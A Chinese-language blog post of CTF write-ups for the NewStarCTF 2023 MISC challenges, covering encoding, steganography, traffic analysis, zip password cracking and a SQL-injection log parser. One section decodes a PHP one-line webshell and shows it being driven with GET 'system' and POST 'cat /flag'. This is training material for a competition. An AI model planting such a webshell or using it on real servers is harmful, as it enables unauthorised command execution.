<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, shrink-to-fit=no">
    <meta name="referrer" content="origin">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="Cache-Control" content="no-transform">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <title>
        
            2023NewStarCTF-MISC
        
    </title>
    <link rel="shortcut icon" href="#"/>

    <link type="text/css" rel="stylesheet" href="/font/LongCang.css">
    <link type="text/css" rel="stylesheet" href="/font/Monda.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSansSC.css">
    <link type="text/css" rel="stylesheet" href="/font/NotoSerifSC.css">
    <link type="text/css" rel="stylesheet" href="/font/Playball.css">
    <link type="text/css" rel="stylesheet" href="/font/PTMono.css">
    <link type="text/css" rel="stylesheet" href="/font/Roboto.css">
    <link type="text/css" rel="stylesheet" href="/font/RobotoSlab.css">
    <link type="text/css" rel="stylesheet" href="/font/Rosario.css">
    <link type="text/css" rel="stylesheet" href="/font/UbuntuMono.css">

    <link type="text/css" rel="stylesheet" href="/css/base.css">
    <link type="text/css" rel="stylesheet" href="/css/code.css">

    <script type="text/javascript" src="/js/jquery-3.4.1.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>
<body>
    <a id="cover"></a>
    <link type="text/css" rel="stylesheet" href="/css/post.css">
<div id="header" class="header">
    <div class="vertical">
        <div class="inner">
            
                <h1 class="header-subtitle">2023NewStarCTF-MISC</h1>
                <div class="header-subinfo">
                    <p class="article-info-text">
                        <span>
                            <i class="iconfont icon-time"></i> 发表时间：2023-10-12
                        </span>
                        
                            
                                <span id="/posts/674257797/" class="leancloud_visitors" data-flag-title="2023NewStarCTF-MISC">
                                    <i class="iconfont icon-browse"></i> 阅读：<sapn class="leancloud-visitors-count"></span>
                                </span>
                            
                            
                                <span>
                                    <i class="iconfont icon-interactive"></i> 评论：<span class="valine-comment-count" data-xid="/posts/674257797/"></span>
                                </span>
                              
                        
                    </p>
                    
                        
                            <span class="category-color">CTF</span>
                        
                            <span class="category-color">WriteUp</span>
                        
                    
                    
                        
                            <span class="tag-color">MISC</span>
                        
                    
                </div>
            
        </div>
    </div>
    
</div>
<div id="container">
    
        <!-- 文章页面 -->
        <div id="article">
            <div class="toc"></div>
            <div class="article-body">
                <h2 id="WEEK1"><a href="#WEEK1" class="headerlink" title="[WEEK1]"></a><code>[WEEK1]</code></h2><h3 id="CyberChef-s-Secret"><a href="#CyberChef-s-Secret" class="headerlink" title="CyberChef&#39;s Secret"></a><code>CyberChef&#39;s Secret</code></h3><p>打开<code>flag.txt</code>，一眼base，使用<code>basecrack</code>脚本进行解密</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSB2h6"><img src="https://z1.ax1x.com/2023/10/12/piSB2h6.png" alt="piSB2h6.png"></a></p>
<p>可以看到实际上是多层不同<code>base</code>编码套娃</p>
<h3 id="机密图片"><a href="#机密图片" class="headerlink" title="机密图片"></a>机密图片</h3><p>得到一个二维码，扫不出什么东西，只有一个欢迎词，<code>png</code>图片可能<code>LSB</code>有东西，用<code>stegdolve</code>和<code>zsteg</code>都行</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSDnb9"><img src="https://z1.ax1x.com/2023/10/12/piSDnb9.png" alt="piSDnb9.png"></a></p>
<h3 id="流量！鲨鱼！"><a href="#流量！鲨鱼！" class="headerlink" title="流量！鲨鱼！"></a>流量！鲨鱼！</h3><p>一个不算是很大的流量分析，搜索<code>flag</code>字符串，有很多访问文件的流量，看到有直接访问<code>flag.txt</code>，但是回显包是404，尝试使用过滤器将回显包状态码为200的筛选出来查看</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSs8ne"><img src="https://z1.ax1x.com/2023/10/12/piSs8ne.png" alt="piSs8ne.png"></a></p>
<p>找到一串<code>base</code>编码，正确解码即可</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSsBjS"><img src="https://z1.ax1x.com/2023/10/12/piSsBjS.png" alt="piSsBjS.png"></a></p>
<h3 id="压缩包们"><a href="#压缩包们" class="headerlink" title="压缩包们"></a>压缩包们</h3><p>将得到的文件补齐zip压缩包的文件头（<code>50 4B 03 04</code>）,解压出来的<code>flag.zip</code>以为是伪加密，修改标志位（从文件头往后第八个字节）为<code>00</code>之后发现提取时出现数据错误，无法正确提取<code>flag.txt</code>，撤销修改，查看压缩文件注释，有一串<code>base</code>字符</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSsX36"><img src="https://z1.ax1x.com/2023/10/12/piSsX36.png" alt="piSsX36.png"></a></p>
<p>解码得到</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSyA8P"><img src="https://z1.ax1x.com/2023/10/12/piSyA8P.png" alt="piSyA8P.png"></a></p>
<p>此消息提示我们要爆破，将之前的<code>flag.zip</code>修改成真加密，将以 <code>50 4B 01 02</code> 开头的数据块的标志位（第10个字节处）也改成09，用<code>ARCHPR</code>进行六位数字爆破</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSyD8x"><img src="https://z1.ax1x.com/2023/10/12/piSyD8x.png" alt="piSyD8x.png"></a></p>
<p>解压得到<code>flag</code></p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSygqe"><img src="https://z1.ax1x.com/2023/10/12/piSygqe.png" alt="piSygqe.png"></a></p>
<h3 id="空白格"><a href="#空白格" class="headerlink" title="空白格"></a>空白格</h3><p>预期解：</p>
<p>本道题目应该是<a target="_blank" rel="noopener" href="https://www.dcode.fr/whitespace-language"><code>Whitespace Language</code></a>网站直接解密即可得到<code>flag</code></p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piS6ZJ1"><img src="https://z1.ax1x.com/2023/10/12/piS6ZJ1.png" alt="piS6ZJ1.png"></a></p>
<p>非预期解：</p>
<p>查看文件<code>16</code>进制</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piS63od"><img src="https://z1.ax1x.com/2023/10/12/piS63od.png" alt="piS63od.png"></a></p>
<p>将<code>20</code>替换成<code>点</code>，将<code>09</code>替换成 <code>-</code> ，将<code>0A</code>替换成 <code>/</code> ，最后摩斯解码，发现只有一个 <code>%u66</code>（这里不知道为什么，有大佬明白可以评论解答困惑，感激不尽），看到66感觉是flag（<code>0x66</code>是小写 <code>f</code> 的<code>ASCII</code>码），现在将 <code>/</code> 再换成空格，再进行摩斯解码，得到完整字串，如下</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSczuT"><img src="https://z1.ax1x.com/2023/10/12/piSczuT.png" alt="piSczuT.png"></a></p>
<p>像是<code>Unicode</code>，但又不完全是，修改一下格式解码即可得到<code>flag</code></p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSgVv6"><img src="https://z1.ax1x.com/2023/10/12/piSgVv6.png" alt="piSgVv6.png"></a></p>
<p>附上我的成品摩斯</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">...--..--. - .....--.--.. - .....--....- - .....--..--- - .....----.-- - .....---.--- - .....--..-- - .....-.----- - .....--.-... - .....--.-.. - .....---.--. - .....--..-- - .....-.----- - .....---.-.. - .....--.---- - .....--.... - .....-.----- - .....--.--.- - .....--.-.. - .....--.---. - .....----..- - .....-.----- - .....---.--- - .....--.-... - .....--...- - .....---.-.. - .....--..-- - .....-.----- - .....---..-- - .....---.... - .....--.-.. - .....--...-- - .....--..-.- - .....-.----- - .....--..-. - .....--....- - .....--.-.- - .....--...-. - .....--.-.. - .....--..-.- - .....--.... - .....--.-.. - .....-----.- - ..</span><br></pre></td></tr></table></figure>

<p><code>ps:</code>简单题目复杂化我是有一手的！</p>
<p>注：此道题目并不是我所说的复杂化，而是那个网站刚好能翻译出来上面提到的结果，不一定全部网站都不能生成和我上面类似的结果，我试了几个网站是不可以的（大家可以自行验证），我手中的工具也不能解码成一样的效果，所以这道题目算是运气了，在此仅以记录，大家图一乐，下面附上我当时的摩斯翻译的网站，有明白具体为什么这个网站可以这样解密的大佬希望点拨一下，感激不尽！</p>
<p>在线摩斯密码翻译器：<a target="_blank" rel="noopener" href="https://www.lddgo.net/encrypt/morse">https://www.lddgo.net/encrypt/morse</a></p>
<h3 id="隐秘的眼睛"><a href="#隐秘的眼睛" class="headerlink" title="隐秘的眼睛"></a>隐秘的眼睛</h3><p>提示很明显，<code>silenteye</code>解码即可得到flag</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/piSHPat"><img src="https://z1.ax1x.com/2023/10/12/piSHPat.png" alt="piSHPat.png"></a></p>
<h2 id="WEEK2"><a href="#WEEK2" class="headerlink" title="[WEEK2]"></a><code>[WEEK2]</code></h2><h3 id="新建Word文档"><a href="#新建Word文档" class="headerlink" title="新建Word文档"></a>新建Word文档</h3><p>word文档没啥新鲜的活，7zip解压看一下document.xml中有一段新佛曰，随便找一个在线网站解密就行</p>
<h3 id="永不消逝的电波"><a href="#永不消逝的电波" class="headerlink" title="永不消逝的电波"></a>永不消逝的电波</h3><p>一听就是摩斯密码，用Audicity看，转换一下解密即可</p>
<h3 id="1-序章"><a href="#1-序章" class="headerlink" title="1-序章"></a>1-序章</h3><p>判断下哪个是正确注入得到的ASCII，提取出来转换即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 脚本一把梭</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;access.log&quot;</span>, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    Data = f.readlines()</span><br><span class="line"></span><br><span class="line">trueFlags = <span class="string">&quot;&quot;</span></span><br><span class="line">tempFlag = <span class="string">&quot;&quot;</span>  <span class="comment"># 每次循环保留行中注入得到的数据</span></span><br><span class="line">record = <span class="string">&quot;1&quot;</span>  <span class="comment"># 记录字符顺序，随着循环进行变化</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> line <span class="keyword">in</span> Data:</span><br><span class="line">    temp = line</span><br><span class="line"></span><br><span class="line">    tempIndex = -<span class="number">1</span></span><br><span class="line"></span><br><span class="line">    equalIndex = <span class="number">0</span>  <span class="comment"># 注入得到的数据的索引末尾</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">2</span>):</span><br><span class="line">        tempIndex = temp.find(<span class="string">&quot;=&quot;</span>, tempIndex + <span class="number">1</span>, <span class="built_in">len</span>(temp))</span><br><span class="line">        <span class="keyword">if</span> j == <span class="number">1</span>:</span><br><span class="line">            equalIndex = tempIndex</span><br><span class="line"></span><br><span class="line">    tempIndex = -<span class="number">1</span>  <span class="comment"># 找出一行中所有指定字符的下标</span></span><br><span class="line"></span><br><span class="line">    index1 = <span class="number">0</span>  <span class="comment"># 字符顺序索引起始</span></span><br><span class="line">    index2 = <span class="number">0</span>  <span class="comment"># 字符顺序索引末尾</span></span><br><span class="line">    index3 = <span class="number">0</span>  <span class="comment"># 注入得到的数据的索引末尾</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">4</span>):</span><br><span class="line">        tempIndex = temp.find(<span class="string">&quot;,&quot;</span>, tempIndex + <span class="number">1</span>, <span class="built_in">len</span>(temp))</span><br><span class="line">        <span class="keyword">if</span> i == <span class="number">1</span>:</span><br><span class="line">            index1 = tempIndex</span><br><span class="line">        <span class="keyword">if</span> i == <span class="number">2</span>:</span><br><span class="line">            index2 = tempIndex</span><br><span class="line">        <span class="keyword">if</span> i == <span class="number">3</span>:</span><br><span class="line">            index3 = tempIndex</span><br><span class="line"></span><br><span class="line">    <span class="comment"># 判断 (x,1) 中索引x的变化，来得到成功注入的字符并加入trueFlags</span></span><br><span class="line">    <span class="keyword">if</span> temp[index1 + <span class="number">1</span> : index2] != record:</span><br><span class="line">        trueFlags += <span class="built_in">chr</span>(<span class="built_in">int</span>(tempFlag))</span><br><span class="line">        record = temp[index1 + <span class="number">1</span> : index2]  <span class="comment"># 更新注入字符的索引</span></span><br><span class="line">    <span class="comment"># 索引一样则继续寻找下一行</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        record = temp[index1 + <span class="number">1</span> : index2]</span><br><span class="line">        tempFlag = temp[equalIndex + <span class="number">1</span> : index3]</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">f&quot;分析sql日志得到的数据为：\n<span class="subst">&#123;trueFlags&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># 肉眼识别，看完脑袋晕</span></span><br><span class="line">data = <span class="string">&quot;121,111,117,95,119,52,110,116,95,115,51,99,114,101,116,102,108,97,103,123,106,117,115,116,95,119,52,114,109,95,117,112,95,115,48,95,121,111,117,95,110,51,101,100,95,104,52,114,100,101,114,95,54,48,50,54,99,100,51,50,125,44&quot;</span></span><br><span class="line">DataList = data.split(<span class="string">&quot;,&quot;</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> DataList:</span><br><span class="line">    <span class="built_in">print</span>(<span class="built_in">chr</span>(<span class="built_in">int</span>(i, <span class="number">10</span>)), end=<span class="string">&quot;&quot;</span>)</span><br></pre></td></tr></table></figure>

<h3 id="base"><a href="#base" class="headerlink" title="base!"></a>base!</h3><p>Byxs20佬，MISC神！！！Puzzlesolver一把梭，之后Cyberchef（好像是base58吧）就有了</p>
<p><a target="_blank" rel="noopener" href="https://github.com/Byxs20/PuzzleSolver">B神的GitHub</a>，大家可以给B神点点Star，开发不易。</p>
<h3 id="WebShell的利用"><a href="#WebShell的利用" class="headerlink" title="WebShell的利用"></a>WebShell的利用</h3><p>给了index.php，直接解密即可，代码自己看就行，没几行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Decode</span>(<span class="params"><span class="variable">$GetData</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">str_rot13</span>(<span class="title function_ invoke__">convert_uudecode</span>(<span class="title function_ invoke__">str_rot13</span>(<span class="title function_ invoke__">base64_decode</span>(<span class="variable">$GetData</span>))));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$Data</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&#x27;enc.txt&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$Results</span> = <span class="title function_ invoke__">Decode</span>(<span class="variable">$Data</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$pattern</span> = <span class="string">&quot;/&#x27;([^&#x27;]*)&#x27;/&quot;</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="variable">$decodeCount</span> = <span class="number">0</span>;</span><br><span class="line"><span class="variable">$lastMatchedResult</span> = <span class="variable">$Results</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> (<span class="title function_ invoke__">preg_match</span>(<span class="variable">$pattern</span>, <span class="variable">$Results</span>, <span class="variable">$matches</span>)) &#123;</span><br><span class="line">    <span class="variable">$lastMatchedResult</span> = <span class="variable">$Results</span>;</span><br><span class="line">    <span class="variable">$Results</span> = <span class="title function_ invoke__">Decode</span>(<span class="variable">$matches</span>[<span class="number">1</span>]);</span><br><span class="line">    <span class="variable">$decodeCount</span>++;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;最后结果是: &quot;</span> . <span class="variable">$lastMatchedResult</span> . <span class="string">&quot;\n&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;解码次数: &quot;</span> . <span class="variable">$decodeCount</span>;</span><br><span class="line"><span class="comment">// enc.txt里面放入需要解密的内容</span></span><br><span class="line"><span class="comment">// results：error_reporting(0);($_GET[&#x27;7d67973a&#x27;])($_POST[&#x27;9fa3&#x27;]);</span></span><br></pre></td></tr></table></figure>

<p>Get 和 Post 传参，Url+?7d67973a&#x3D;system，Hackbar 中 Post 传 9fa3&#x3D;cat &#x2F;flag，完事</p>
<h3 id="Jvav"><a href="#Jvav" class="headerlink" title="Jvav"></a>Jvav</h3><p>Java盲水印，GitHub上有现成的工具，直接梭就行</p>
<h2 id="Week3"><a href="#Week3" class="headerlink" title="[Week3]"></a>[Week3]</h2><p>…………….</p>
<p>停止提交再放出个人解法</p>

                
                <p class="end">__END__</p>
            </div>
            <div class="article-footer">
                <div class="suffix-box">
    <div class="suffix-box-left">
        <img src="https://z1.ax1x.com/2023/10/11/piS9tjx.jpg" alt="shuy1ng">
    </div>
    <div class="suffix-box-right">
        <span class="suffix-box-title">文章作者：</span>shuy1ng
        <br>
        <span class="suffix-box-title">文章出处：</span><a href="/posts/674257797/" target="_blank">2023NewStarCTF-MISC</a>
        <br>
        <span class="suffix-box-title">作者签名：</span>It takes a strong man to save himself, and a great man to save another.
        <br>
        <span class="suffix-box-title">关于主题：</span><a href="https://github.com/first19326/Hexo-LiveForCode" target="_blank">Hexo - Live For Code</a>
        <br>
        <span class="suffix-box-title">版权声明：</span>文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" title="BY-NC-SA" target="_blank">BY-NC-SA</a> 许可协议，转载请注明出处
        <br>
    </div>
    <div style="clear: both;"></div>
</div>
                
                    <div class="category">
                        分类：
                        
                            <a href="/category/CTF/">CTF</a>
                        
                            <a href="/category/CTF/WriteUp/">WriteUp</a>
                        
                    </div>
                
                
                    <div class="tag">
                        标签：
                        
                            <a href="/tag/MISC/">MISC</a>
                        
                    </div>
                
                <div class="article-prev-next">
                    
                        <a href="/posts/1849771340/" class="prev-prefix">« </a> 上一篇：    <a href="/posts/1849771340/" title="发布于 2023-10-13 05:00">2023BalsnCTF-RE-复现</a>
                        <br>
                    
                    
                        <a href="/posts/1112885395/" class="next-prefix">» </a> 下一篇：    <a href="/posts/1112885395/" title="发布于 2023-10-11 10:00">博客主题的链接</a>
                    
                </div>
            </div>
            
    <div class="article-comments">
        
            <div class="comments-title">
                评论列表
            </div>
        
        <div class="comments-content"></div>
    </div>
    
 
        </div>
    
</div>
    <div id="footer">
    <div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 WorstOne. All Rights Reserved.</div>
</div>
    <div id="sidebar">
    <div class="menu-wrap" style="display:none;">
        
            <div class="menu-notice">
                <span class="iconfont icon-notice"></span>
                <div class="notice">
                    <span>A strong man can save himself. A great man can save another.</span>
                </div>
            </div>
        
        <nav class="menu">
            <div class="menu-introduce"> 
                <div class="introduce-avatar">
                    <img src="https://z1.ax1x.com/2023/10/11/piS9tjx.jpg">
                </div> 
                <div class="introduce-info"> 
                    <div class="introduce-user">
                        
                            <a href="https://github.com/shuy1ngg" target="_blank"><span>shuy1ng</span></a>
                        
                    </div>
                </div> 
            </div> 
            <div class="menu-list">
                <ul>
                    
                        <li class=""><a href="/" class="" target="_self"><span class="iconfont icon-home-fill"></span>首页</a></li>
                    
                        <li class=""><a href="/category" class="" target="_self"><span class="iconfont icon-folder-fill"></span>分类</a></li>
                    
                        <li class=""><a href="/tag" class="" target="_self"><span class="iconfont icon-discount-fill"></span>标签</a></li>
                    
                        <li class=""><a href="/donate" class="" target="_self"><span class="iconfont icon-heart-fill"></span>赞赏</a></li>
                    
                        <li class=""><a href="/about" class="" target="_self"><span class="iconfont icon-about-fill"></span>关于</a></li>
                    
                        <li class=""><a href="javascript:;" class="search" target="_self"><span class="iconfont icon-search-menu"></span>搜索</a></li>
                    
                        <li class=""><a href="/comment" class="" target="_self"><span class="iconfont icon-comments-fill"></span>留言板</a></li>
                    
                        <li class=""><a href="/friend" class="" target="_self"><span class="iconfont icon-link"></span>友情链接</a></li>
                    
                </ul> 
            </div> 
            <div class="menu-link">
                <div class="box">
                    <div class="image-box"></div>
                </div>
                
                    <a name="GitHub" href="https://github.com/shuy1ngg" class="" target="_blank" data=""><span class="iconfont icon-github"></span></a>
                
            </div> 
        </nav>
        <button class="menu-button-close"></button>
        <div class="morph-shape" id="morph-shape" data-morph-open="M-7.312,0H15c0,0,66,113.339,66,399.5C81,664.006,15,800,15,800H-7.312V0z;M-7.312,0H100c0,0,0,113.839,0,400c0,264.506,0,400,0,400H-7.312V0z">
            <svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 100 800" preserveAspectRatio="none">
                <path d="M-7.312,0H0c0,0,0,113.839,0,400c0,264.506,0,400,0,400h-7.312V0z"/>
            </svg>
        </div>
    </div>
    <button class="menu-button-open">MENU</button>
    <div class="menu-cover"></div>
</div>
    <link type="text/css" rel="stylesheet" href="/css/search.css">
<script type="text/javascript" src="/js/iscroll.js"></script>
<script type="text/javascript" src="/js/instantsearch.min.js"></script>
<div class="search-window">
    <div class="search-content">
        <div class="search-content-icon">
            <i class="iconfont icon-search"></i>
        </div>
        <div id="search-input" class="search-input"></div>
    </div>

    <div class="search-scroll">
        <div class="search-result">
            <div id="search-stats" class="search-stats"></div>
            <div id="search-hits"></div>
            <div id="search-pagination" class="search-pagination"></div>
        </div>
    </div>

    <span class="search-close-icon">
        <i class="iconfont icon-close"></i>
    </span>
</div>
    <div id="tools">
    <div class="progressbar-top"></div>
    
    <link type="text/css" rel="stylesheet" href="/css/APlayer.css">
    <script type="text/javascript" src="/js/APlayer.min.js"></script>
    <script type="text/javascript" src="/js/Meting.min.js"></script>
    <script>
        var meting_api = 'https://api.i-meto.com/meting/api?server=:server&type=:type&id=:id&auth=:auth&r=:r';
    </script>
    <meting-js id="3778678" lrcshow="false" server="netease" type="playlist" fixed="true" autoplay="false" loop="all" order="random" preload="auto" volume="0.67" mutex="true"></meting-js>

    <div class="wrap-right">
    <div class="wrap-right-hide">
         <div class="wrap-right-button favorites">
            <div class="iconbox" switch="false">
                <span class="iconfont icon-favorites"></span>
            </div>
            <span class="icontext">关注</span>
         </div>
        <div class="wrap-right-button search">
            <div class="iconbox">
                <span class="iconfont icon-search-menu"></span>
            </div>
            <span class="icontext">搜索</span>
        </div>
        <div class="wrap-right-button menu-button">
            <div class="iconbox">
                <span class="iconfont icon-menu"></span>
            </div>
            <span class="icontext">菜单</span>
        </div>
        <div class="wrap-right-button mode">
            <div class="light">
                <div class="iconbox">
                    <span class="iconfont icon-daymode"></span>
                </div>
                <span class="icontext">浅色模式</span>
            </div>
            <div class="dark">
                <div class="iconbox">
                    <span class="iconfont icon-nightmode-fill"></span>
                </div>
                <span class="icontext">深色模式</span>
            </div>
        </div>
        <div class="wrap-right-button bottom">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">跳至底部</span>
        </div>
    </div>
    <div class="wrap-right-show">
        <div class="wrap-right-button set">
            <div class="iconbox">
                <span class="iconfont icon-setting"></span>
            </div>
            <span class="icontext">设置</span>
        </div>
        <div class="wrap-right-button top">
            <div class="iconbox">
                <span class="iconfont icon-top"></span>
            </div>
            <span class="icontext">返回顶部</span>
        </div>
    </div>
</div>
    <div class="loading"></div>
</div>
    <script>
    window.config = {
        GitHubUserName     : "",
        GitHubRepositories : "",

        User             : "shuy1ng",
        UserAvatar       : "https://z1.ax1x.com/2023/10/11/piS9tjx.jpg",
        WebsiteStartDate : "2023-10-11",
        Home             : "https://github.com/shuy1ngg",

        WebsiteTitleBlur         : "休息一下吧~",
        WebsiteTitleBlurTimeOut  : 500,
        WebsiteTitleFocus        : "Welcome back!!!",
        WebsiteTitleFocusTimeOut : 1000,
        WebsiteFavicon           : {
            light : "/image/website/logo/logo.png",
            dark  : "/image/website/logo/logo-dark.png"
        },

        ProgressBar : {
            id       : "topProgressBar",
            color    : "#77B6FF",
            height   : "2px",
            duration : 0.2
        },

        Loading: {
            rebound : {
                tension  : 16,
                friction : 5
            },
            spinner : {
                id     : "spinner",
                radius : 90,
                sides  : 3,
                depth  : 4,
                colors : {
                    background : "#F0F0F0",
                    stroke     : "#272633",
                    base       : "",
                    child      : "#272633"
                },
                alwaysForward : true,
                restAt        : 0.5,
                renderBase    : false
            }
        },

        HomeHeaderAnimationRendered : true,
        HomeHeaderAnimation         : {
            radius      : 15,
            density     : 0.2,
            color       : "rgba(255, 255, 255, .2)",
            clearOffset : 0.3
        },

        BackAnimationRendered          : true,
        IEBrowserBackAnimationRendered : false,
        BackAnimation                  : {
            colorSaturation  : "60%",
            colorBrightness  : "50%",
            colorAlpha       : 0.5,
            colorCycleSpeed  : 5,
            verticalPosition : "random",
            horizontalSpeed  : 200,
            ribbonCount      : 3,
            strokeSize       : 0,
            parallaxAmount   : -0.2,
            animateSections  : true
        },

        HomeHeaderImage : [
            
                "/image/header/home.jpg",
            
        ],
        HomeBannerText  : "You are a gift from heaven, my late redemption. You are an immortal star, a dream day after day@SYE",

        ArticleHeaderImage : [
            
                "/image/header/article.jpg",
            
        ],

        OtherBannerText : "",

        Error : {
            icon    : "icon-swimming",
            title   : "PAGE NOT FOUND",
            content : [
                
                    "很抱歉，您访问的页面不存在！",
                
                    "可能是输入地址有误或该地址已变更。",
                
            ],
            buttons : [
                
                    {
                        icon  : "icon-home",
                        text  : "返回首页",
                        href  : "/",
                        class : ""
                    },
                
            ]
        },

        MenuNotice : {
            enable : true,
            notice : "A strong man can save himself. A great man can save another.",
            speed  : 20
        },
        MenuList : [
            
                {
                    name   : "首页",
                    icon   : "icon-home-fill",
                    href   : "/",
                    type   : "index",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "分类",
                    icon   : "icon-folder-fill",
                    href   : "/category",
                    type   : "category",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "标签",
                    icon   : "icon-discount-fill",
                    href   : "/tag",
                    type   : "tag",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "赞赏",
                    icon   : "icon-heart-fill",
                    href   : "/donate",
                    type   : "donate",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "关于",
                    icon   : "icon-about-fill",
                    href   : "/about",
                    type   : "about",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "搜索",
                    icon   : "icon-search-menu",
                    href   : "javascript:;",
                    type   : "",
                    class  : "search",
                    target : "_self"
                },
            
                {
                    name   : "留言板",
                    icon   : "icon-comments-fill",
                    href   : "/comment",
                    type   : "comment",
                    class  : "",
                    target : "_self"
                },
            
                {
                    name   : "友情链接",
                    icon   : "icon-link",
                    href   : "/friend",
                    type   : "friend",
                    class  : "",
                    target : "_self"
                },
            
        ],
        MenuLink : [
            
                
                    {
                        name   : "GitHub",
                        icon   : "icon-github",
                        href   : "https://github.com/shuy1ngg",
                        class  : "",
                        target : "_blank",
                        image  : ""
                    },
                
            
        ],

        FooterStyle : 2,
        BottomText  : "<div><span class='face'>ღゝ◡╹)ノ♡</span></div><div>【人生若只如初见<span><i class='iconfont icon-like-fill'></i></span>何事秋风悲画扇】</div><div>&copy; 2020-2023 WorstOne. All Rights Reserved.</div>",

        ConsoleList : [
            
                
                    [
                        
                            
                                "Based on cnblogs theme SimpleMemory.",
                            
                                "",
                            
                        
                    ],
                
                    [
                        
                            
                                "SimpleMemory Author:",
                            
                                "BNDong",
                            
                        
                    ],
                
                    [
                        
                            
                                "Theme:",
                            
                                "LiveForCode",
                            
                        
                    ],
                
            
        ],

        FontIconExtend : "",

        Donate : {
            paypal  : "",
            bitcoin : "",
            alipay  : "/image/donate/alipay.png",
            wechat  : "/image/donate/wechat.png"
        },

        Search : {
            applicationID : "010C3EANT8",
            apiKey        : "c7abab9f11b79102b9aff7fe6d41447d",
            indexName     : "Notes",
            hits          : {
                page : 10
            },
            labels        : {
